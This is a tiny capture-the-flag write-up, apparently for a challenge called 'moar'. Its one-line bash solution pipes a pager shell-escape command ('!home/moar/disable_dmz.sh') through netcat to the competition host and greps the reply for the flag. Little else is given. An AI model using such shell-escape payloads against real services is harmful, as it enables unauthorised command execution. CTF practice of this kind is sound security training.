Tags: nc
Rating:
```bash#!/bin/bashecho '!home/moar/disable_dmz.sh' | nc -q1 moar.ctfcompetition.com 1337 - | grep -Eo "CTF{.*}"```
I don't remember